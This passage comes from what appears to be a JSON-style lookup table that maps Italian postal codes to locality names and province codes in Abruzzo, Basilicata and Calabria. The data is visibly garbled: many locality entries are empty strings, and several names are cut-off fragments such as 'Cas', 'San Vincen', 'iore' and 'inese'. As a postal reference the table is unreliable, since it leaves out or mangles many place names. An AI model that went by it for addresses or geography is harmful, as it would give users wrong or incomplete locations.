["Sambuceto", "CH"], ["", "CH"], ["", "CH"], ["Paglieta", "CH"], ["", "CH"], ["Sant'Egidio", "CH"], ["Scerni", "CH"], ], "66021": [["Miracoli", "CH"], ["Cas", "CH"], ["Casalbordino", "CH"]], "66022": [["Villascorciosa", "CH"], ["Scorciosa", "CH"], ["", "CH"], ["Fossacesia", "CH"]], "66023": [["", "CH"], ["", "CH"]], "66026": [ ["Ortona", "CH"], ["", "CH"], ["", "CH"], ["", "CH"], ["", "CH"], ["", "CH"], ["", "CH"], ["", "CH"], ["", "CH"], ], "66030": [ ["Montazzoli", "CH"], ["Filetto", "CH"], ["", "CH"], ["", "CH"], ["Arielli", "CH"], ["Guastameroli", "CH"], ["Poggiofiorito", "CH"], ["Treglio", "CH"], ["Frisa", "CH"], ["", "CH"], ["Mozzagrogna", "CH"], ], "66031": [["Casalanguida", "CH"]], "66032": [["", "CH"]], "66033": [["", "CH"]], "66034": [ ["Rizzacorno", "CH"], ["", "CH"], ["Lanciano", "CH"], ["Nasuti", 
"CH"], ["Sant'Amato", "CH"], ["", "CH"], ], "66036": [["Orsogna", "CH"]], "66037": [["", "CH"]], "66038": [["", "CH"], ["", "CH"], ["", "CH"]], "66040": [ ["Pennadomo", "CH"], ["Roccascalegna", "CH"], ["Pietraferrazzana", "CH"], ["Quadri", "CH"], ["Civitaluparella", "CH"], ["Rosello", "CH"], ["Giuliopoli", "CH"], ["Selva", "CH"], ["Pizzoferrato", "CH"], ["", "CH"], ["Altino", "CH"], ["Monteferrante", "CH"], ["Perano", "CH"], ["Montelapiano", "CH"], ["Buonanotte", "CH"], ["Colledimezzo", "CH"], ["Fallo", "CH"], ["", "CH"], ["", "CH"], ["Gamberale", "CH"], ["Borrello", "CH"], ["Castelguidone", "CH"], ], "66041": [ ["", "CH"], ["Atessa", "CH"], ["", "CH"], ["", "CH"], ["Piazzano", "CH"], ], "66042": [["Bomba", "CH"]], "66043": [["Casoli", "CH"], ["", "CH"]], "66044": [["", "CH"], ["Archi", "CH"]], "66045": [["", "CH"], ["", "CH"]], "66046": [["", "CH"], ["Tornareccio", "CH"]], "66047": [["", "CH"]], "66050": [ ["Lentella", "CH"], ["Guardiabruna", "CH"], ["Tufillo", "CH"], ["Torrebruna", "CH"], ["", "CH"], ["", "CH"], ["Roccaspinalveti", "CH"], ["Furci", "CH"], ["Guilmi", "CH"], ["Dogliola", "CH"], ["Olmi", "CH"], ["", "CH"], ["Fraine", "CH"], ["Liscia", "CH"], ["Monteodorisio", "CH"], ["", "CH"], ["Carunchio", "CH"], ["Fresagrandinaria", "CH"], ["", "CH"], ["Palmoli", "CH"], ], "66051": [["Cupello", "CH"]], "66052": [["Gissi", "CH"]], "66054": [ ["", "CH"], ["", "CH"], ["Vasto", "CH"], ["", "CH"], ["", "CH"], ], "66100": [ ["Brecciarola", "CH"], ["Tricalle", "CH"], ["Chieti", "CH"], ["", "CH"], ["", "CH"], ], "65010": [ ["", "PE"], ["Moscufo", "PE"], ["", "PE"], ["", "PE"], ["Elice", "PE"], ["Piccianello", "PE"], ["Vicoli", "PE"], ["", "PE"], ["Collecorvino", "PE"], ["", "PE"], ["", "PE"], ["Spoltore", "PE"], ["Barberi", "PE"], ["Farindola", "PE"], ["Vestea", "PE"], ["", "PE"], ["Congiunti", "PE"], ["Brittoli", "PE"], ["", "PE"], ["Civitaquana", "PE"], ["", "PE"], ["Nocciano", "PE"], ["Picciano", "PE"], ["", "PE"], ], "65011": [["Catignano", "PE"]], "65012": [ ["Villareia", "PE"], ["", "PE"], ["Vallemare", "PE"], ["Villanova", "PE"], ["Cepagatti", "PE"], ], "65013": [ ["Marina", "PE"], ["", "PE"], ["", "PE"], ["", "PE"], ], "65014": [["", "PE"]], "65015": [ ["", "PE"], ["", "PE"], ["Montesilvano", "PE"], ["", "PE"], ["", "PE"], ], "65017": [["Penne", "PE"], ["Roccafinadamo", "PE"]], "65019": [["Pianella", "PE"], ["Cerratina", "PE"], ["Castellana", "PE"]], "65020": [ ["Bolognano", "PE"], ["Cugnoli", "PE"], ["", "PE"], ["Alanno", "PE"], ["Corvara", "PE"], ["Salle", "PE"], ["", "PE"], ["", "PE"], ["Pietranico", "PE"], ["Ticchione", "PE"], ["Lettomanoppello", "PE"], ["Musellaro", "PE"], ["Roccamorice", "PE"], ["", "PE"], ["Rosciano", "PE"], ["", "PE"], ["Abbateggio", "PE"], ["San Valentino In Abruzzo Citeriore", "PE"], ["Pescosansonesco", "PE"], ["Turrivalignani", "PE"], ["Pesconuovo", "PE"], ["", "PE"], ["", "PE"], ["", "PE"], ], "65022": [["", "PE"], ["", "PE"]], "65023": [["", "PE"], ["", "PE"]], "65024": [ ["Ripacorbaria", "PE"], ["Manoppello", "PE"], ["", "PE"], ["", "PE"], ], "65025": [["Serramonacesca", "PE"]], "65026": [["Popoli", "PE"]], "65027": [["Scafa", "PE"], ["Decontra", "PE"]], "65028": [["", "PE"]], "65029": [["", "PE"]], "65100": [["Pescara", "PE"]], "65121": [["Pescara", "PE"]], "65122": [["Pescara", "PE"]], "65123": [["Pescara", "PE"]], "65124": [["Pescara", "PE"]], "65125": [["Pescara", "PE"], ["", "PE"]], "65126": [["Pescara", "PE"]], "65127": [["Pescara", "PE"]], "65128": [["Pescara", "PE"]], "65129": [["Pescara", "PE"], ["", "PE"]], "65131": [["Fontanelle", "PE"]], 
"65132": [["", "PE"], ["Pescara", "PE"]], "64010": [ ["", "TE"], ["", "TE"], ["Cesano", "TE"], ["Colonnella", "TE"], ["", "TE"], ["Ancarano", "TE"], ["", "TE"], ["", "TE"], ["", "TE"], ["Pietralta", "TE"], ["Ioanella", "TE"], ["", "TE"], ["", "TE"], ["", "TE"], ["", "TE"], ["Controguerra", "TE"], ["", "TE"], ["Pascellata", "TE"], ["Ponzano", "TE"], ["", "TE"], ["", "TE"], ["Leofara", "TE"], ["", "TE"], ], "64011": [["", "TE"]], "64012": [ ["Paterno", "TE"], ["", "TE"], ["Sant'Onofrio", "TE"], ["Piancarani", "TE"], ["Campli", "TE"], ["Campovalano", "TE"], ["", "TE"], ], "64013": [["Corropoli", "TE"]], "64014": [["Martinsicuro", "TE"], ["", "TE"], ["", "TE"]], "64015": [["Nereto", "TE"]], "64016": [ ["", "TE"], ["Paolantonio", "TE"], ["Faraone", "TE"], ["", "TE"], ["", "TE"], ], "64018": [["Tortoreto", "TE"], ["Salino", "TE"], ["", "TE"]], "64020": [ ["", "TE"], ["Zaccheo", "TE"], ["Canzano", "TE"], ["Pagliare", "TE"], ["Petriccione", "TE"], ["", "TE"], ["Casemolino", "TE"], ["", "TE"], ["Castelbasso", "TE"], ["Castellalto", "TE"], ["", "TE"], ["Ripattoni", "TE"], ["", "TE"], ["Bellante", "TE"], ], "64021": [["", "TE"], ["Colleranesco", "TE"], ["Giulianova", "TE"]], "64023": [["", "TE"], ["Montone", "TE"], ["Notaresco Stazione", "TE"]], "64024": [["", "TE"], ["", "TE"], ["Notaresco", "TE"]], "64025": [ ["", "TE"], ["Mutignano", "TE"], ["Scerne", "TE"], ["", "TE"], ["Pineto", "TE"], ], "64026": [ ["Cologna", "TE"], ["Montepagano", "TE"], ["", "TE"], ["", "TE"], ["", "TE"], ["", "TE"], ["", "TE"], ["", "TE"], ], "64027": [["Garrufo", "TE"], ["", "TE"], ["Sant'Omero", "TE"]], "64028": [["Pianacce", "TE"], ["", "TE"], ["", "TE"], ["Silvi", "TE"]], "64030": [["Basciano", "TE"], ["", "TE"], ["Montefino", "TE"], ["", "TE"]], "64031": [["Arsita", "TE"]], "64032": [ ["Atri", "TE"], ["Casoli", "TE"], ["", "TE"], ["", "TE"], ["Fontanelle", "TE"], ["", "TE"], ["", "TE"], ["Treciminiere", "TE"], ["", "TE"], ], "64033": [["Bisenti", "TE"]], "64034": [["Appignano", "TE"], ["", "TE"]], "64035": [["Castilenti", "TE"], ["", "TE"]], "64036": [["Scorrano", "TE"], ["", "TE"]], "64037": [["Montegualtieri", "TE"], ["", "TE"], ["Cermignano", "TE"]], "64039": [["", "TE"], ["", "TE"]], "64040": [["Cortino", "TE"], ["Padula", "TE"], ["Pagliaroli", "TE"]], "64041": [["Castelli", "TE"], ["Colledoro", "TE"]], "64042": [["Colledara", "TE"], ["", "TE"], ["", "TE"]], "64043": [ ["Cesacastina", "TE"], ["Crognaleto", "TE"], ["Tottea", "TE"], ["", "TE"], ["Cervaro", "TE"], ["", "TE"], ["", "TE"], ["Nerito", "TE"], ["", "TE"], ], "64044": [["Cerqueto", "TE"], ["", "TE"]], "64045": [ ["", "TE"], ["", "TE"], ["Cerchiara", "TE"], ["", "TE"], ["", "TE"], ], "64046": [ ["Cusciano", "TE"], ["", "TE"], ["Leognano", "TE"], ["", "TE"], ], "64047": [["Intermesoli", "TE"], ["Pietracamela", "TE"]], "64049": [["Chiarino", "TE"], ["Azzinano", "TE"], ["Tossicia", "TE"]], "64100": [ ["", "TE"], ["", "TE"], ["' A Tordino", "TE"], ["", "TE"], ["Tordinia", "TE"], ["Varano", "TE"], ["Castagneto", "TE"], ["Forcella", "TE"], ["Nepezzano", "TE"], ["Miano", "TE"], ["Cartecchio", "TE"], ["", "TE"], ["Frondarola", "TE"], ["Sant'Atto", "TE"], ["", "TE"], ["Colleminuccio", "TE"], ["", "TE"], ["Teramo", "TE"], ["", "TE"], ["Spiano", "TE"], ], "75010": [ ["Miglionico", "MT"], ["Craco", "MT"], ["Garaguso", "MT"], ["Peschiera", "MT"], ["Grottole", "MT"], ["", "MT"], ["Calciano", "MT"], ["Gorgoglione", "MT"], ["Cirigliano", "MT"], ["Aliano", "MT"], ["", "MT"], ], "75011": [["Accettura", "MT"]], "75012": [["", "MT"], ["Metaponto", "MT"], ["Bernalda", "MT"], 
["", "MT"]], "75013": [["Macchia", "MT"], ["", "MT"], ["Ferrandina", "MT"]], "75014": [["Grassano", "MT"]], "75015": [["Pisticci", "MT"], ["Marconia", "MT"], ["", "MT"]], "75016": [["Pomarico", "MT"]], "75017": [["Salandra", "MT"]], "75018": [["Stigliano", "MT"]], "75019": [["Tricarico", "MT"], ["Calle", "MT"]], "75020": [ ["", "MT"], ["o", "MT"], ["", "MT"], ["Recoleta", "MT"], ["Nova Siri Stazione", "MT"], ], "75021": [["Colobraro", "MT"]], "75022": [["Irsina", "MT"], ["Taccone", "MT"]], "75023": [["", "MT"]], "75024": [["Montescaglioso", "MT"]], "75025": [["Policoro", "MT"]], "75026": [["Rotondella", "MT"]], "75027": [["", "MT"]], "75028": [["Gannano", "MT"], ["Caprarico", "MT"], ["Tursi", "MT"]], "75029": [["Valsinni", "MT"]], "75100": [["", "MT"], ["Matera", "MT"], ["Venusio", "MT"]], "85010": [ ["Gallicchio", "PZ"], ["Banzi", "PZ"], ["", "PZ"], ["Abriola", "PZ"], ["", "PZ"], ["Armento", "PZ"], ["Calvello", "PZ"], ["", "PZ"], ["Pignola", "PZ"], ["", "PZ"], ["Rifreddo", "PZ"], ["Pantano", "PZ"], ["Castelmezzano", "PZ"], ["", "PZ"], ["Campomaggiore", "PZ"], ["Cancellara", "PZ"], ["Pietrapertosa", "PZ"], ["", "PZ"], ["Missanello", "PZ"], ["Anzi", "PZ"], ], "85011": [["Acerenza", "PZ"]], "85012": [["", "PZ"]], "85013": [["", "PZ"]], "85014": [["Laurenzana", "PZ"]], "85015": [["", "PZ"]], "85016": [["Pietragalla", "PZ"], ["San Giorgio", "PZ"]], "85017": [["Tolve", "PZ"]], "85018": [["Trivigno", "PZ"]], "85020": [ ["", "PZ"], ["", "PZ"], ["Ginestra", "PZ"], ["Sterpito", "PZ"], ["", "PZ"], ["", "PZ"], ["Dragonetti", "PZ"], ["Filiano", "PZ"], ["", "PZ"], ["Sant'Andrea", "PZ"], ["Rapone", "PZ"], ["Maschito", "PZ"], ["", "PZ"], ["Atella", "PZ"], ["", "PZ"], ["Montemilone", "PZ"], ["Sant'Ilario", "PZ"], ["Lagopesole", "PZ"], ["Pescopagano", "PZ"], ["Scalera", "PZ"], ["Ripacandida", "PZ"], ["", "PZ"], ["", "PZ"], ], "85021": [ ["Avigliano", "PZ"], ["", "PZ"], ["", "PZ"], ["Sant'Angelo", "PZ"], ["", "PZ"], ["Possidente", "PZ"], ["", "PZ"], ], "85022": [["Barile", "PZ"]], "85023": [["Forenza", "PZ"]], "85024": [["Gaudiano", "PZ"], ["Lavello", "PZ"]], "85025": [["Foggiano", "PZ"], ["Melfi", "PZ"], ["", "PZ"]], "85026": [["", "PZ"]], "85027": [["Rapolla", "PZ"]], "85028": [["Monticchio", "PZ"], ["Rionero In Vulture", "PZ"], ["", "PZ"]], "85029": [["Venosa", "PZ"]], "85030": [ ["Mezzana", "PZ"], ["Calvera", "PZ"], ["", "PZ"], ["", "PZ"], ["", "PZ"], ["Carbone", "PZ"], ["Cersosimo", "PZ"], ["", "PZ"], ["", "PZ"], ["", "PZ"], ["Villaneto", "PZ"], ["", "PZ"], ["", "PZ"], ["", "PZ"], ], "85031": [["Castelsaraceno", "PZ"], ["Frusci", "PZ"], ["Miraldo", "PZ"]], "85032": [["Teana", "PZ"], ["Chiaromonte", "PZ"]], "85033": [["Episcopia", "PZ"]], "85034": [["Fardella", "PZ"], ["", "PZ"]], "85035": [["Noepoli", "PZ"]], "85036": [["Roccanova", "PZ"]], "85037": [["", "PZ"], ["Sant'Arcangelo", "PZ"]], "85038": [["Senise", "PZ"]], "85039": [["Spinoso", "PZ"]], "85040": [ ["", "PZ"], ["Rivello", "PZ"], ["", "PZ"], ["", "PZ"], ["Viggianello", "PZ"], ["", "PZ"], ["", "PZ"], ["Nemoli", "PZ"], ], "85042": [["Lagonegro", "PZ"]], "85043": [["Latronico", "PZ"], ["Mileo", "PZ"], ["Cerri", "PZ"], ["Agromonte", "PZ"], ["Magnano", "PZ"]], "85044": [ ["Lauria", "PZ"], ["Seluci", "PZ"], ["", "PZ"], ["Cogliandrino", "PZ"], ["", "PZ"], ["Galdo", "PZ"], ["", "PZ"], ["Pecorone", "PZ"], ], "85046": [ ["Massa", "PZ"], ["", "PZ"], ["Acquafredda", "PZ"], ["", "PZ"], ["Maratea", "PZ"], ], "85047": [["Moliterno", "PZ"]], "85048": [["Rotonda", "PZ"]], "85049": [["Trecchina", "PZ"], ["", "PZ"]], "85050": [ ["", "PZ"], ["", "PZ"], ["", "PZ"], 
["Castelgrande", "PZ"], ["Balvano", "PZ"], ["Sarconi", "PZ"], ["", "PZ"], ["", "PZ"], ["", "PZ"], ["Tito", "PZ"], ["", "PZ"], ["Brienza", "PZ"], ["", "PZ"], ["Marsicovetere", "PZ"], ["Paterno", "PZ"], ["Baragiano", "PZ"], ["", "PZ"], ], "85051": [["Bella", "PZ"], ["", "PZ"]], "85052": [["Galaino", "PZ"], ["Pergola", "PZ"], ["", "PZ"]], "85053": [["Montemurro", "PZ"]], "85054": [["", "PZ"], ["", "PZ"]], "85055": [["Picerno", "PZ"]], "85056": [["Ruoti", "PZ"]], "85057": [["Tramutola", "PZ"]], "85058": [["Mosileo", "PZ"], ["", "PZ"]], "85059": [["Viggiano", "PZ"]], "85100": [["Giuliano", "PZ"], ["Montocchio", "PZ"], ["Potenza", "PZ"]], "87010": [ ["Lattarico", "CS"], ["Saracena", "CS"], ["Acquaformosa", "CS"], ["Mottafollone", "CS"], ["Regina", "CS"], ["", "CS"], ["", "CS"], ["Cervicati", "CS"], ["", "CS"], ["", "CS"], ["", "CS"], ["Civita", "CS"], ["Frascineto", "CS"], ["Malvito", "CS"], ["Firmo", "CS"], ["", "CS"], ["Lungro", "CS"], ["Sartano", "CS"], ["San Basile", "CS"], ["", "CS"], ["Policastrello", "CS"], ["Eianina", "CS"], ["", "CS"], ["Ioggi", "CS"], ["San Donato Di Ninea", "CS"], ["San Sosti", "CS"], ], "87011": [ ["Sibari Stazione", "CS"], ["Lattughelle", "CS"], ["Lauropoli", "CS"], ["Pianoscafo", "CS"], ["Sibari", "CS"], ["Doria", "CS"], ["", "CS"], ], "87012": [["", "CS"], ["Castrovillari", "CS"]], "87013": [["", "CS"]], "87014": [["", "CS"]], "87015": [["", "CS"]], "87016": [["", "CS"]], "87017": [["", "CS"]], "87018": [ ["San Marco Argentano Stazione", "CS"], ["San Marco Roggiano Stazione", "CS"], ["San Marco Argentano", "CS"], ], "87019": [["Spezzano Albanese Stazione", "CS"], ["Spezzano Albanese Terme", "CS"], ["Spezzano Albanese", "CS"]], "87020": [ ["", "CS"], ["Sangineto", "CS"], ["Marcellina", "CS"], ["Acquappesa", "CS"], ["Maiera'", "CS"], ["", "CS"], ["Bonifati", "CS"], ["", "CS"], ["Grisolia", "CS"], ["Aieta", "CS"], ["Buonvicino", "CS"], ["Torrevecchia", "CS"], ["Orsomarso", "CS"], ["", "CS"], ["Le Crete", "CS"], ["Granata", "CS"], ["", "CS"], ["", "CS"], ["Intavolata", "CS"], ["", "CS"], ["", "CS"], ["", "CS"], ["Verbicaro", "CS"], ["Papasidero", "CS"], ["", "CS"], ["", "CS"], ["Tortora", "CS"], ], "87021": [["Laise", "CS"], ["", "CS"], ["", "CS"]], "87022": [ ["", "CS"], ["Cetraro", "CS"], ["", "CS"], ["Battendieri", "CS"], ["", "CS"], ["Sant'Angelo", "CS"], ], "87023": [["Cirella", "CS"], ["Diamante", "CS"]], "87024": [["Cariglio", "CS"], ["", "CS"], ["Scarcelli", "CS"], ["Fuscaldo", "CS"]], "87026": [["Mormanno", "CS"]], "87027": [ ["", "CS"], ["", "CS"], ["Paola", "CS"], ["", "CS"], ["Fosse", "CS"], ["", "CS"], ], "87028": [["", "CS"]], "87029": [["Scalea", "CS"]], "87030": [ ["San Vincen", "CS"], ["", "CS"], ["Carolei", "CS"], ["Belsito", "CS"], ["Domanico", "CS"], ["San ", "CS"], ["", "CS"], ["", "CS"], ["Malito", "CS"], ["", "CS"], ["Cleto", "CS"], ["", "CS"], ["Vadue", "CS"], ["", "CS"], ["Longobardi", "CS"], ["Savuto", "CS"], ["Scornavacca", "CS"], ["Gesuiti", "CS"], ["Torremezzo", "CS"], ["", "CS"], ["", "CS"], ["San Biase", "CS"], ["Reggio", "CS"], ], "87031": [["", "CS"]], "87032": [["", "CS"], ["Amantea", "CS"], ["", "CS"], ["Corica", "CS"]], "87033": [["", "CS"], ["", "CS"], ["Vadi", "CS"]], "87034": [["Grimaldi", "CS"]], "87035": [["Terrati", "CS"], ["Greci", "CS"], ["", "CS"], ["Lago", "CS"]], "87036": [ ["Roges", "CS"], ["", "CS"], ["Arcavacata", "CS"], ["Commenda", "CS"], ["Rende", "CS"], ["Castiglione Cosentino Stazione", "CS"], ["Surdo", "CS"], ["Quattromiglia", "CS"], ], "87037": [["", "CS"], ["Bucita", "CS"]], "87038": [["", "CS"], ["Pollella", 
"CS"]], "87040": [ ["", "CS"], ["", "CS"], ["", "CS"], ["", "CS"], ["", "CS"], ["Mongrassano", "CS"], ["Rosario", "CS"], ["", "CS"], ["Rose", "CS"], ["", "CS"], ["", "CS"], ["", "CS"], ["Cavallerizzo", "CS"], ["", "CS"], ["", "CS"], ["Andreotta", "CS"], ["", "CS"], ["Zumpano", "CS"], ["Malavicina", "CS"], ["", "CS"], ["", "CS"], ["Mendicino", "CS"], ["Tarsia", "CS"], ["Luzzi", "CS"], ["Tivolille", "CS"], ["", "CS"], ["", "CS"], ["Ortomatera", "CS"], ["", "CS"], ["Timparello", "CS"], ["Maione", "CS"], ["Cerzeto", "CS"], ["Altilia", "CS"], ["Castrolibero", "CS"], ["Parenti", "CS"], ], "87041": [ ["Acri", "CS"], ["Montagnola", "CS"], ["Serricella", "CS"], ["", "CS"], ["Duglia", "CS"], ], "87042": [["Altomonte", "CS"]], "87043": [["Bisignano", "CS"]], "87044": [["Cerisano", "CS"]], "87045": [["Laurignano", "CS"], ["Tessano", "CS"], ["Dipignano", "CS"]], "87046": [ ["Parantoro", "CS"], ["Caldopiano", "CS"], ["", "CS"], ["Vaccarizzo", "CS"], ["", "CS"], ], "87047": [["Redipiano", "CS"], [" In Guarano", "CS"], ["San Pietro In Guarano", "CS"]], "87048": [["", "CS"]], "87050": [ ["", "CS"], ["Trenta", "CS"], ["Carpanzano", "CS"], ["Magli", "CS"], ["", "CS"], ["Morelli", "CS"], ["Perito", "CS"], ["", "CS"], ["Rovito", "CS"], ["Bianchi", "CS"], ["Pedace", "CS"], ["Marzi", "CS"], ["Borboruso", "CS"], ["Panettieri", "CS"], ["Pedivigliano", "CS"], ["Colosimi", "CS"], ["", "CS"], ["", "CS"], ["Cellara", "CS"], ["", "CS"], ["Pietrafitta", "CS"], ["Mangone", "CS"], ["", "CS"], ["Lappano", "CS"], ], "87051": [["Vico", "CS"], ["", "CS"], ["Aprigliano", "CS"]], "87052": [ ["Moccone", "CS"], ["", "CS"], ["", "CS"], ["Camigliatello", "CS"], ["", "CS"], ], "87053": [["Celico", "CS"]], "87054": [["Rogliano", "CS"], ["Saliano", "CS"]], "87055": [["Lorica", "CS"], ["", "CS"], ["iore", "CS"]], "87056": [["", "CS"]], "87057": [["Scigliano", "CS"], ["Diano", "CS"], ["Calvisi", "CS"]], "87058": [["", "CS"]], "87060": [ ["Marinella", "CS"], ["", "CS"], ["", "CS"], ["San Cosmo Albanese", "CS"], ["Terravecchia", "CS"], ["Pietrapaola Stazione", "CS"], ["Caloveto", "CS"], ["Paludi", "CS"], ["San Giorgio Albanese", "CS"], ["Calopezzati", "CS"], ["Crosia", "CS"], ["Camigliano", "CS"], ["Mirto", "CS"], ["Cropalati", "CS"], ["Vecchiarello", "CS"], ["Bocchigliero", "CS"], ["Pietrapaola", "CS"], ["", "CS"], ["Mandatoriccio", "CS"], ], "87061": [["Campana", "CS"]], "87062": [["Cariati", "CS"], ["", "CS"]], "87064": [ ["", "CS"], ["Fabrizio", "CS"], ["", "CS"], ["Schiavonea", "CS"], ["", "CS"], ["", "CS"], ["", "CS"], ["Cantinella", "CS"], ], "87066": [["Longobucco", "CS"], ["Destro", "CS"]], "87067": [["Rossano", "CS"], ["Piragineti", "CS"], ["Amica", "CS"], ["Rossano Stazione", "CS"]], "87069": [["", "CS"], ["", "CS"]], "87070": [ ["Castroregio", "CS"], ["Canna", "CS"], ["Plataci", "CS"], ["Farneta", "CS"], ["Albidona", "CS"], ["", "CS"], ["", "CS"], ["", "CS"], ["Nocara", "CS"], ["Montegiordano", "CS"], ["", "CS"], ["", "CS"], ["", "CS"], ["", "CS"], ["", "CS"], ], "87071": [["", "CS"], ["Amendolara", "CS"]], "87072": [["", "CS"]], "87073": [["Oriolo", "CS"]], "87074": [["", "CS"], ["", "CS"]], "87075": [["Trebisacce", "CS"]], "87076": [ ["", "CS"], ["", "CS"], ["Villapiana", "CS"], ["", "CS"], ], "87100": [ ["Cosenza", "CS"], ["", "CS"], ["Donnici Inferiore", "CS"], ["Sant'Ippolito Di Cosenza", "CS"], ["", "CS"], ["Casali", "CS"], ["Sanvito", "CS"], ], "88020": [["Jacurso", "CZ"], ["Cortale", "CZ"]], "88021": [["Roccelletta", "CZ"], ["Borgia", "CZ"], ["San Floro", "CZ"]], "88022": [["Curinga", "CZ"], ["Acconia", "CZ"]], 
"88024": [["Girifalco", "CZ"]], "88025": [["San Pietro A Maida", "CZ"], ["Maida", "CZ"]], "88040": [ ["Martelletto", "CZ"], ["Martirano", "CZ"], ["", "CZ"], ["San Pietro Apostolo", "CZ"], ["Cicala", "CZ"], ["", "CZ"], ["Conflenti", "CZ"], ["", "CZ"], ["", "CZ"], ["Amato", "CZ"], ["Settingiano", "CZ"], ["Castagna", "CZ"], ["Serrastretta", "CZ"], ["Platania", "CZ"], ["", "CZ"], ["Pianopoli", "CZ"], ["", "CZ"], ["Carlopoli", "CZ"], ["San Michele", "CZ"], ["Cancello", "CZ"], ["Ievoli", "CZ"], ["Angoli", "CZ"], ["San Mazzeo", "CZ"], ["", "CZ"], ["Gizzeria", "CZ"], ["Miglierina", "CZ"], ["Accaria", "CZ"], ["Conflenti Inferiore", "CZ"], ["Migliuso", "CZ"], ], "88041": [["Decollatura", "CZ"], ["San Bernardo", "CZ"], ["Adami", "CZ"], ["Cerrisi", "CZ"]], "88042": [["", "CZ"], ["Falerna", "CZ"], ["", "CZ"]], "88044": [["Marcellinara", "CZ"]], "88045": [ ["", "CZ"], ["Gimigliano", "CZ"], ["", "CZ"], ["Cavora'", "CZ"], ], "88046": [ ["", "CZ"], ["", "CZ"], ["Fronti", "CZ"], ["Zangarona", "CZ"], ["Nicastro", "CZ"], ["Caronte", "CZ"], ["", "CZ"], ["", "CZ"], ["Gabella", "CZ"], ["", "CZ"], ["Sambiase", "CZ"], ["Acquafredda", "CZ"], ["", "CZ"], ["", "CZ"], ], "88047": [["", "CZ"], ["inese", "CZ"]], "88049": [["San Tommaso", "CZ"], ["Colla", "CZ"], ["", "CZ"]], "88050": [ ["Simeri", "CZ"], ["Belcastro", "CZ"], ["Sellia", "CZ"], ["Amaroni", "CZ"], ["Petrona'", "CZ"], ["Crichi", "CZ"], ["Vallefiorita", "CZ"], ["", "CZ"], ["", "CZ"], ["", "CZ"], ["Palermiti", "CZ"], ["", "CZ"], ["", "CZ"], ["", "CZ"], ["Uria", "CZ"], ["Magisano", "CZ"], ["Scoppolise", "CZ"], ["", "CZ"], ["Andali", "CZ"], ["Pentone", "CZ"], ["Marcedusa", "CZ"], ["", "CZ"], ["Petrizia", "CZ"], ["Cerva", "CZ"], ["", "CZ"], ["Calabricata", "CZ"], ["Zagarise", "CZ"], ], "88051": [["Cuturella", "CZ"], ["Cropani", "CZ"], ["", "CZ"]], "88054": [["Sersale", "CZ"]], "88055": [ ["", "CZ"], ["Albi", "CZ"], ["Buturo", "CZ"], ["", "CZ"], ["Taverna", "CZ"], ["", "CZ"], ["", "CZ"], ], "88056": [["Pratora", "CZ"], ["Tiriolo", "CZ"]], "88060": [ ["Davoli", "CZ"], ["", "CZ"], ["Montepaone", "CZ"], ["", "CZ"], ["", "CZ"], ["Argusto", "CZ"], ["San Sostene", "CZ"], ["", "CZ"], ["Montauro", "CZ"], ["", "CZ"], ["", "CZ"], ["", "CZ"], ["Badolato", "CZ"], ["Gagliato", "CZ"], ["", "CZ"], ["", "CZ"], ["", "CZ"], ["Petrizzi", "CZ"], ["", "CZ"], ["Satriano", "CZ"], ["", "CZ"], ["", "CZ"], ["Gasperina", "CZ"], ["Santa Caterina ", "CZ"], ], "88062": [["Cardinale", "CZ"], ["Novalba", "CZ"]], "88064": [["", "CZ"]], "88065": [["Guardavalle", "CZ"], ["", "CZ"]], "88067": [["Cenadi", "CZ"], ["Centrache", "CZ"], ["", "CZ"], ["Olivadi", "CZ"]], "88068": [["", "CZ"], ["", "CZ"], ["Soverato", "CZ"]], "88069": [ ["", "CZ"], ["Staletti", "CZ"], ["", "CZ"], ["Copanello", "CZ"], ["Squillace", "CZ"], ], "88070": [["Botricello", "CZ"]], "88100": [ ["Pontegrande", "CZ"], ["Sant'Elia", "CZ"], ["Siano", "CZ"], ["", "CZ"], ["", "CZ"], ["", "CZ"], ["Catanzaro", "CZ"], ["", "CZ"], ], "88811": [["", "KR"]], "88812": [["Crucoli", "KR"], ["Torretta", "KR"], ["", "KR"]], "88813": [["Ciro'", "KR"]], "88814": [["Melissa", "KR"], ["", "KR"]], "88815": [["", "KR"]], "88816": [["Strongoli", "KR"]], "88817": [["", "KR"], ["Carfizzi", "KR"]], "88818": [["Pallagorio", "KR"]], "88819": [["Verzino", "KR"]], "88821": [["", "KR"], ["Corazzo", "KR"]], "88822": [["Zinga", "KR"], ["Casabona", "KR"]], "88823": [["Umbriatico", "KR"], ["Perticaro", "KR"]], "88824": [["", "KR"]], "88825": [["Savelli", "KR"]], "88831": [["", "KR"], ["Scandale", "KR"]], "88832": [["Altilia", "KR"], ["", "KR"]], "88833": [["Caccuri", 
"KR"], ["Cerenzia", "KR"]], "88834": [["Castelsilano", "KR"]], "88835": [["Roccabernarda", "KR"]], "88836": [["Cotronei", "KR"]], "88837": [["Camellino", "KR"], ["Pagliarelle", "KR"], ["Foresta", "KR"], ["", "KR"]], "88838": [["Filippa", "KR"], ["Mesoraca", "KR"]], "88841": [ ["", "KR"], ["Sant'Anna", "KR"], ["", "KR"], ["", "KR"], ], "88842": [["", "KR"], ["Cutro", "KR"], ["", "KR"]], "88900": [["", "KR"], ["Crotone", "KR"], ["Papanice", "KR"]], "89010": [["Scido", "RC"], ["", "RC"], ["Varapodio", "RC"], ["Molochio", "RC"]], "89011": [ ["Marinella", "RC"], ["Ceramida", "RC"], ["Pellegrina", "RC"], ["", "RC"], ["", "RC"], ["", "RC"], ], "89012": [["Delianuova", "RC"]], "89013": [["", "RC"], ["", "RC"]], "89014": [ ["Tresilico", "RC"], ["Zurgonadio", "RC"], ["Piminoro", "RC"], ["Castellace", "RC"], ["Messignadi", "RC"], ["", "RC"], ], "89015": [["Palmi", "RC"], ["Taureana", "RC"], ["Trodio", "RC"]], "89016": [["Rizziconi", "RC"], ["Spina", "RC"], ["Drosi", "RC"], ["Cirello", "RC"]], "89017": [["", "RC"]], "89018": [ ["Acciarello", "RC"], ["", "RC"], ["Ferrito", "RC"], ["Cannitello", "RC"], ["", "RC"], ], "89020": [ ["Serrata", "RC"], ["", "RC"], ["", "RC"], ["Tritanti", "RC"], ["Maropati", "RC"], ["Giffone", "RC"], ["Melicucca'", "RC"], ["Melicucco", "RC"], ["", "RC"], ["Anoia", "RC"], ["", "RC"], ["", "RC"], ["'", "RC"], ["Candidoni", "RC"], ["Sinopoli", "RC"], ], "89021": [["Cinquefrondi", "RC"]], "89022": [["Cittanova", "RC"]], "89023": [["Stelletanone", "RC"], ["Bellantone", "RC"], ["", "RC"]], "89024": [["Polistena", "RC"]], "89025": [["Bosco", "RC"], ["Rosarno", 